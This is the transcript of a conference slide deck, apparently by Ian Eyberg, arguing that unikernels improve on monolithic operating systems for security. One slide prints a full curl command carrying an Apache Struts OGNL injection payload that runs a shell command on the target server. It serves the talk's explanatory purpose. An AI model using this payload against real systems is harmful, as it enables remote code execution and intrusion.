Climbing Out From the Digital Mud with Unikernels - HL2017

Climbing Out From the Digital Mud with Unikernels Ian Eyberg

THE MONOLITHIC OPERATING SYSTEM

DIGITAL MUD

A Decade Of Wasted Cores

L I B X M L 2

USB DRIVERS

mongodb of devops

HISTORY OF SOFTWARE DEVELOPMENT OVER 4 DECADES

JANUARY 1ST 1970

What Is An Operating System?

What is an application? 7f 45 4c 46

security

pagerduty alert

ulimits are off?? bash: fork: retry: Resource temporarily unavailable bash:
fork: retry: Resource temporarily unavailable bash: fork: retry: Resource temporarily unavailable bash: fork: retry: Resource temporarily unavailable bash: fork: retry: Resource temporarily unavailable bash: fork: retry: Resource temporarily unavailable bash: fork: retry: Resource temporarily unavailable bash: fork: retry: Resource temporarily unavailable bash: fork: retry: Resource temporarily unavailable bash: fork: retry: Resource temporarily unavailable bash: fork: retry: Resource temporarily unavailable bash: fork: retry: Resource temporarily unavailable

sudo apt- get install emacs

VICTORY

2 weeks later

SUDO OH- FUCKING-SHIT

security pain

143M records of personal information stolen

C I O , C I S O , C
E O “ R E T I R E D ”

M U LT I P L E C O N
G R E S S I O N A L H E A R I N G S

I N S I D E R T R A
D I N G I N V E S T I G AT I O N

D O Z E N S O F C L
A S S A C T I O N L AW S U I T S

curl i -s -k -x $’GET’ \ —H $'User-Agent: Mozilla/5.0'
-H $'Content-Type: %{(#_=\'multipart/form- data\').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess? (#_memberAccess=#dm): ((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']). (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class )).(#ognlUtil.getExcludedPackageNames().clear()). (#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))). (#cmd=\'ls -lat /\'). (#iswin=(@java.lang.System@getProperty(\'os.name\').toLowerCase().contains(\'w in\'))).(#cmds=(#iswin?{\'cmd.exe\',\'/c\',#cmd}:{\'/bin/bash\',\'- c\',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)). (#p.redirectErrorStream(true)).(#process=#p.start()). (#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream( ))).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)). (#ros.flush())}' $’https://pure.ownage'

PA S S W O R D S ? S
H E L L ? D B A C C E S S ?

T H E F U T U R E I
S U N I K E R N E L S

single process

n o u s e r s

NO SHELL

OIL PLATFORM WANTS TO SECURE CONTROL DATA

BIO TECH FIRM WANTS CHEAP SECURE COMPUTE

NOTABLE UNIKERNEL PROJECTS

https://github.com/Solo5/solo5 u n i c o r e

TEXT 2.3MS BOOT TIME sysml.neclab.eu/projects/lightvm

GO GET GITHUB.COM/DEFERPANIC/ VIRGO

▸ search for existing apps ▸ create a new app
▸ show running apps ▸ show installed apps ▸ run an app ▸ pull project D E M O T I M E

GITHUB.COM/DEFERPANIC/VIRGO

WHAT WILL YOU BUILD?

Climbing Out From the Digital Mud with Unikerne...

Climbing Out From the Digital Mud with Unikernels - HL2017

More Decks by Ian Eyberg

Other Decks in Programming

Featured

Transcript